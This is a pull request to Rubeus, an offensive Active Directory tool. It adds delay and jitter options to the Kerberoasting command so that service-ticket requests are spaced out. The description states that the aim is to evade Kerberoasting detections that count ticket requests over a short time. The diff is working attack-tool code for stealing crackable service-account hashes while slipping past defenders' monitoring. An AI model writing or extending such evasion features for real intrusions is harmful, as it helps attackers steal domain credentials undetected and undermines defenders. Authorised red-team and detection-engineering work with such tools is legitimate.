### PR TITLE
add delay and jitter for kerberoasting

### DIFF
--- a/Rubeus/Commands/Kerberoast.cs
+++ b/Rubeus/Commands/Kerberoast.cs
@@ -15,6 +15,8 @@ namespace Rubeus.Commands
             string OU = "";
             string outFile = "";
             string domain = "";
+            int delay = 0;
+            int jitter = 0;
             string dc = "";
             string supportedEType = "rc4";
             bool useTGTdeleg = false;
@@ -24,6 +26,17 @@ namespace Rubeus.Commands
             {
                 spn = arguments["/spn"];
             }
+
+            if (arguments.ContainsKey("/delay"))
+            {
+                delay = Int32.Parse(arguments["/delay"]);
+            }
+
+            if (arguments.ContainsKey("/jitter"))
+            {
+                jitter = Int32.Parse(arguments["/jitter"]);
+            }
+
             if (arguments.ContainsKey("/user"))
             {
                 user = arguments["/user"];
@@ -99,11 +112,11 @@ namespace Rubeus.Commands
 
                 System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName);
 
-                Roast.Kerberoast(spn, user, OU, domain, dc, cred, outFile, TGT, useTGTdeleg, supportedEType);
+                Roast.Kerberoast(spn, user, OU, domain, dc, cred, outFile, TGT, useTGTdeleg, supportedEType, delay, jitter);
             }
             else
             {
-                Roast.Kerberoast(spn, user, OU, domain, dc, null, outFile, TGT, useTGTdeleg, supportedEType);
+                Roast.Kerberoast(spn, user, OU, domain, dc, null, outFile, TGT, useTGTdeleg, supportedEType, delay, jitter);
             }
         }
     }

--- a/Rubeus/lib/Helpers.cs
+++ b/Rubeus/lib/Helpers.cs
@@ -30,6 +30,24 @@ namespace Rubeus
             }
         }
 
+         public static int RandomDelayWithJitter(int delay, int jitter)
+        {
+            if (delay == 0)
+            {
+                return 0;
+            }
+
+            if (jitter == 0)
+            {
+                return delay;
+            }
+
+            var rnd = new Random();
+            var percent = (int)Math.Floor((double)(jitter * (delay / 100)));
+            var temp = delay + rnd.Next(-percent, percent);
+            return temp;
+        }
+        
         private static Random random = new Random();
         public static string RandomString(int length)
         {

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -6,6 +6,7 @@ using System.Text.RegularExpressions;
 using System.Security.Principal;
 using System.DirectoryServices;
 using System.DirectoryServices.AccountManagement;
+using System.Threading;
 
 namespace Rubeus
 {
@@ -264,7 +265,7 @@ namespace Rubeus
             }
         }
 
-        public static void Kerberoast(string spn = "", string userName = "", string OUName = "", string domain = "", string dc = "", System.Net.NetworkCredential cred = null, string outFile = "", KRB_CRED TGT = null, bool useTGTdeleg = false, string supportedEType = "rc4")
+        public static void Kerberoast(string spn = "", string userName = "", string OUName = "", string domain = "", string dc = "", System.Net.NetworkCredential cred = null, string outFile = "", KRB_CRED TGT = null, bool useTGTdeleg = false, string supportedEType = "rc4", int delay=0, int jitter=0)
         {
             Console.WriteLine("\r\n[*] Action: Kerberoasting\r\n");
 
@@ -529,6 +530,12 @@ namespace Rubeus
                         {
                             // otherwise use the KerberosRequestorSecurityToken method
                             GetTGSRepHash(servicePrincipalName, samAccountName, distinguishedName, cred, outFile);
+                        }
+
+                        var timeToSleep = Helpers.RandomDelayWithJitter(delay, jitter);
+                        if (timeToSleep != 0)
+                        {
+                            Thread.Sleep(timeToSleep);
                         }
                     }
                 }


### PR DESCRIPTION
I added two new options for the kerberoasting command:

- `/delay:[millisec]`. The number of millisec to wait from one TGS-REQ to another;
- `/jitter:[percentace]`. The percentage of jitter to add to each delay.

The aim of these two new options is to evade basic Kerberoasting detections that rely on the number of requested ticket in a short amount of time.